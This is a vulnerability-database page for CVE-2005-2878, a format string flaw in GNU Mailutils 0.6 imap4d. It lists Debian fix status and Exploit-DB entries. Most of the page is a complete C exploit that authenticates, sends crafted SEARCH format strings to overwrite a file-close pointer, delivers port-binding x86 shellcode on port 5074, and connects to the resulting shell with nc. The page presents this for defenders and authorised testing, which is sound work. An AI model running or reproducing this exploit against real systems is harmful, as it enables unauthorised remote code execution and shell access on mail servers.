VIR Vulnerability Intelligence Relay

CVE-2005-2878

unknown
Published — · Modified —
💬 Discuss on Community ✚ Propose mitigation
CVSS v3
CVSS v4 NEW
not yet in upstream
VIR risk
1.0

Description

Format string vulnerability in search.c in the imap4d server in GNU Mailutils 0.6 allows remote authenticated users to execute arbitrary code via format string specifiers in the SEARCH command.

Predictions

Exploit likelihood
20%
Patch ETA

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-1234 remote bsd verified
Angelo Rosiello · 2005-09-26

GNU Mailutils imap4d 0.6 (FreeBSD) - 'Search' Remote Format String

Source code queued for fetch — refresh in a moment.
EDB-1209 remote linux verified text · 6 KB
Clément Lecigne · 2005-09-10

GNU Mailutils imap4d 0.6 - 'Search' Remote Format String

text exploit Source: Exploit-DB 
/*
 *  GNU Mailutils 0.6 imap4d 'search' format string exploit.
 *  Ref: www.idefense.com/application/poi/display?id=303&type=vulnerabilities
 *
 *  This silly exploit uses hardcoded values taken from GNU/Debian testing (etch).
 *
 *  $ ./imap4d_search_expl -h 127.0.0.1 -p 143 -u clem1 -s PROUT
 *  [+] GNU Mailutils 0.6 imap4d 'search' format string exploit.
 *  [+] By clem1.
 *  [+] connecting to: 127.0.0.1:143
 *  [+] authentification: completed.
 *  [+] format string: sended
 *  [+] shellcode sended.
 *  [+] Bingo.
 *  
 *  id;      
 *  uid=1000(clem1) gid=1002(mail) groups=0(root)
 *
 *  Copyright (C) 2005 Clement Lecigne - clem1 @ badcode.info.
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <getopt.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/fcntl.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <arpa/inet.h>

struct values {
	int offset;
	int IO_file_close;
	int addr;
	char mailbox[32];
} v = {
	11,
	0x40468bc4,
	0x80906e0, //0xaabbccdd
	"inbox"
};

void usage(char *);
void auth(int, char *, char *);
void sendsc(int);
void owned(int, char *);
void fmtbuild(int);

/*
 * s0t4ipv6@Shellcode.com.ar
 * x86 portbind a shell in port 5074
 */
char sc[] = "\x31\xc0\x50\x40\x89\xc3\x50\x40"
	    "\x50\x89\xe1\xb0\x66\xcd\x80\x31"
	    "\xd2\x52\x66\x68\x13\xd2\x43\x66"
	    "\x53\x89\xe1\x6a\x10\x51\x50\x89"
	    "\xe1\xb0\x66\xcd\x80\x40\x89\x44"
	    "\x24\x04\x43\x43\xb0\x66\xcd\x80"
	    "\x83\xc4\x0c\x52\x52\x43\xb0\x66"
	    "\xcd\x80\x93\x89\xd1\xb0\x3f\xcd"
	    "\x80\x41\x80\xf9\x03\x75\xf6\x52"
	    "\x68\x6e\x2f\x73\x68\x68\x2f\x2f"
	    "\x62\x69\x89\xe3\x52\x53\x89\xe1"
	    "\xb0\x0b\xcd\x80";

char b[1024];
int i;

int main(int ac, char **av){
	char o, *host, *user, *pass;
	struct hostent *h;
	struct sockaddr_in s;
	int port, fd;
	
	puts("[+] GNU Mailutils 0.6 imap4d 'search' format string exploit.");
	puts("[+] By clem1.");

	if(ac != 9) usage(av[0]);
	
	while((o = getopt(ac,av,"h:p:u:s:")) != EOF) {
		switch (o) {
			case 'h':
				host = optarg;
				break;
			case 'p':
				port = atoi(optarg);
				break;
			case 'u':
				user = optarg;
				break;
			case 's':
				pass = optarg;
				break;
			default:
				usage(av[0]);
				break;
		}
	}
	if((h = gethostbyname(host)) == NULL) {
		herror("[-] gethostbyname()");
		exit(1);
        }
	
	printf("[+] connecting to: %s:%d\n", inet_ntoa(*((struct in_addr *)h->h_addr)), port);

	fd = socket(AF_INET, SOCK_STREAM, 0);
	if(fd == -1){
		perror("[-] socket()");
		exit(1);
	}

	s.sin_family = AF_INET;
	s.sin_port = htons(port);
	s.sin_addr = *((struct in_addr *)h->h_addr);
	bzero(&(s.sin_zero), 8);

	if (connect(fd, (struct sockaddr *)&s, sizeof s) == -1) {
		perror("[-] connect()");
		exit(1);
	}

	i = recv(fd, b, 1023, 0);
	b[i] = 0;
	if(strstr(b, "IMAP4rev1") == NULL){
		puts("[-] failled.");
		exit(1);
	}
	/* authentification. */
	auth(fd, user, pass);
	/* build and send evil format string. */
	fmtbuild(fd);
	/* store shellcode in imap4d rwx adresse space. */
	sendsc(fd);
	/* force a call to fclose, uhm no shellcode ;> */
	owned(fd, host);
	return 0;
}

void auth(int fd, char *user, char *pass){
	memset(b, 0x0, 1024);
	snprintf(b, 1023, "1 LOGIN \"%s\" \"%s\"\n", user, pass);
	if(send(fd, b, strlen(b), 0) == -1){
		perror("[-] send()");
		exit(1);
	}
	memset(b, 0x0, 1024);
	i = recv(fd, b, 1023, 0);
	b[i] = 0x0;
	if(strstr(b, "Completed") == NULL){
		puts("[-] LOGIN failled.");
		exit(1);
	}
	memset(b, 0x0, 1024);
	snprintf(b, 1023, "2 SELECT \"%s\"\n", v.mailbox);
	if(send(fd, b, strlen(b), 0) == -1){
		perror("[-] send()");
		exit(1);
	}
	memset(b, 0x0, 1024);
	while((i = recv(fd, b, 1023, 0)) != -1){
		b[i] = 0x0;
		if(strstr(b, "Completed") != NULL)
			break;
		if(strstr(b, "Couldn't") != NULL){
			puts("[-] SELECT failled.");
			exit(1);
		}
	}
	puts("[+] authentification: completed.");
	return;
}

void sendsc(int fd){
	memset(b, 0x41, 1024);
	memcpy(b + 900, sc, strlen(sc));
	memcpy(b + 1020, " A\n", 3);
	memcpy(b, "3 LIST ", 7);
	if(send(fd, b, strlen(b), 0) == -1){
		perror("[-] send()");
		exit(1);
	}
	memset(b, 0x0, 1024);
	while((i = recv(fd, b, 1023, 0)) != -1){
		b[i] = 0x0;
		if(strstr(b, "Completed") != NULL)
			break;
		if(strstr(b, "BAD") != NULL){
			puts("[-] LIST failled.");
			exit(1);
		}
	}
	puts("[+] shellcode sended.");
	return;
}

void fmtbuild(int fd){
	unsigned char b0, b1, b2, b3;
	int a1, a2;
	a1 = (v.addr & 0xffff0000) >> 16;
	a2 = (v.addr & 0x0000ffff);
	b0 = (v.IO_file_close >> 24) & 0xff;
	b1 = (v.IO_file_close >> 16) & 0xff;
	b2 = (v.IO_file_close >> 8) & 0xff;
	b3 = (v.IO_file_close) & 0xff;
	snprintf(b, sizeof b,     "3 SEARCH TOPIC "
				  "A" /* pad. */
				  "%c%c%c%c" 
				  "%%.%hdx"
				  "%%%d$hn\n",
				  b3 + 2, b2, b1, b0,
				  a1 - 0x24,
				  v.offset);
	if(send(fd, b, strlen(b), 0) == -1){
		perror("[-] send()");
		exit(1);
	}
	while((i = recv(fd, b, 1023, 0)) != -1){
		b[i] = 0x0;
		if(strstr(b, "BAD") != NULL)
			break;
	}
	memset(b, 0x0, 1024);
	snprintf(b, sizeof b,     "3 SEARCH TOPIC "
				  "A" /* pad. */
				  "%c%c%c%c" 
				  "%%.%hdx"
				  "%%%d$hn\n",
				  b3, b2, b1, b0,
				  a2 - 0x24,
				  v.offset);
	if(send(fd, b, strlen(b), 0) == -1){
		perror("[-] send()");
		exit(1);
	}
	while((i = recv(fd, b, 1023, 0)) != -1){
		b[i] = 0x0;
		if(strstr(b, "BAD") != NULL)
			break;
	}
	puts("[+] format string: sended");
	return;
}

void owned(int fd, char *host){
	memset(b, 0x0, 1024);
	snprintf(b, 1023, "3 SUBSCRIBE OWNED\n");
	if(send(fd, b, strlen(b), 0) == -1){
		perror("[-] send()");
		exit(1);
	}
	puts("[+] Bingo.\n");
	sleep(1);
	execl("/bin/nc", "prout", host, "5074", NULL);
	printf("[-] muh? where is nc?\n[+] A shell is waiting you on %s:5074.\n", host);
	return;	
}

void usage(char *ex){
	printf("usage: %s -h <hostname> -p <port> -u <user> -s <password>\n", ex);
	exit(1);
}

// milw0rm.com [2005-09-10]
EDB-3787 remote linux verified
Xpl017Elz · 2007-04-24

GNU Mailutils imap4d 0.6 - exec-shield Remote Format String

Source code queued for fetch — refresh in a moment.

OS impact
debian Debian Fixed 5 releases
VersionStatusFixed in
trixie Fixed 1:0.6.90-3
sid Fixed 1:0.6.90-3
forky Fixed 1:0.6.90-3
bullseye Fixed 1:0.6.90-3
bookworm Fixed 1:0.6.90-3

References

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.